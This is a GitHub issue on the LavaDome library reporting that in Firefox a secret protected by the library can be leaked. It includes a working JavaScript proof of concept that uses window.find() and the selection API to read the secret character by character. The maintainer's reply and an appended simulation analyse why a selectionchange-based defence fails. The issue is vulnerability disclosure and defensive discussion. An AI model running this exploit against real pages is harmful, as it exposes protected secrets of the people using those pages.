LavaMoat / LavaDome

Secure DOM trees isolation and encapsulation leveraging ShadowDOM
https://lavamoat.github.io/LavaDome/packages/core/demo/
MIT License

LavaDome is vulnerable to selection API #15

Open weizman opened 6 months ago

weizman commented 6 months ago

When running in Firefox, a secret protected by LavaDome can easily be leaked.

setTimeout(()=>{
    document.body.prepend('xxx');
    const result = [];
    for (const l of 'abcdefghijklmnopqrstuvwxyz0123456789') {
        while (find(l)) {
            const anchor = getSelection().anchorNode;
            const host = anchor?.parentNode?.parentNode?.host;
            if (host instanceof HTMLElement) {
                const at = Array.from(host.parentElement.children).indexOf(host);
                result[at] = l;
            }
        }
        window.find('xxx', false, true);
    }
    console.log('key', result.join(''));
}, 1000);
weizman commented 6 months ago

We saw that coming already (see "secret splitting" section).

I don't see a way around this at the moment, so either we convince browsers to ship a native and secure Snow version (which will take years) or we convince Firefox to fix the bug that's causing this (wip).

Or we come up with a clever defense. I thought about making use of the selectionchange event, which captures the find call, but since the attack is sync, the secret is compromised before the event fires...

I wonder how this one will play out.
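A Node-only model of the timing argument in the comment above, added here as an illustration and not LavaDome code: the split secret is one simulated host per character, window.find() and selectionchange are stand-ins, and the hypothetical defence wipes the hosts when the event fires. It shows that the event is queued behind the running script, so a synchronous read loop finishes before the defence gets a chance to run.

```javascript
// Constructed model (not LavaDome code): one host per character, a stand-in
// for window.find(), and selectionchange delivered from a task queue that only
// drains once the current script has finished, as a browser event loop would.
const SECRET = 'k3y1'; // constructed sample secret

function makeDocument(secret) {
  const doc = {
    hosts: [...secret].map((ch) => ({ text: ch })), // "secret splitting" layout
    selection: null, // { at } of the host matched last
    listeners: [],   // selectionchange handlers
    queue: [],       // tasks that wait for the running script to return
    eventsFired: 0,
  };
  // Simulated window.find(): matches the next host after the current
  // selection, like repeated find() calls walking forward through the page.
  doc.find = (needle) => {
    const start = doc.selection ? doc.selection.at + 1 : 0;
    const at = doc.hosts.findIndex((h, i) => i >= start && h.text === needle);
    if (at < 0) return false;
    doc.selection = { at };
    for (const fn of doc.listeners) doc.queue.push(() => { doc.eventsFired++; fn(); });
    return true;
  };
  doc.resetSelection = () => { doc.selection = null; }; // the 'xxx' reset in the report
  doc.drain = () => { while (doc.queue.length) doc.queue.shift()(); };
  return doc;
}

// Hypothetical defence from the thread: wipe the split secret on selectionchange.
function armSelectionChangeDefence(doc) {
  doc.listeners.push(() => doc.hosts.forEach((h) => { h.text = ''; }));
}

// Synchronous read in the shape of the report's loop. Nothing queued by
// doc.find() can run until this function returns.
function syncRead(doc) {
  const result = [];
  for (const l of 'abcdefghijklmnopqrstuvwxyz0123456789') {
    while (doc.find(l)) result[doc.selection.at] = l;
    doc.resetSelection();
  }
  return result.join('');
}

// What the loop recovered, how many events had fired by then, and whether the
// defence wiped the hosts once the queued tasks finally ran.
function timeline(secret) {
  const doc = makeDocument(secret);
  armSelectionChangeDefence(doc);
  const recovered = syncRead(doc);
  const firedDuringRead = doc.eventsFired;
  doc.drain(); // script done; the selectionchange tasks run only now
  return { recovered, firedDuringRead, wipedAfterwards: doc.hosts.every((h) => h.text === '') };
}
```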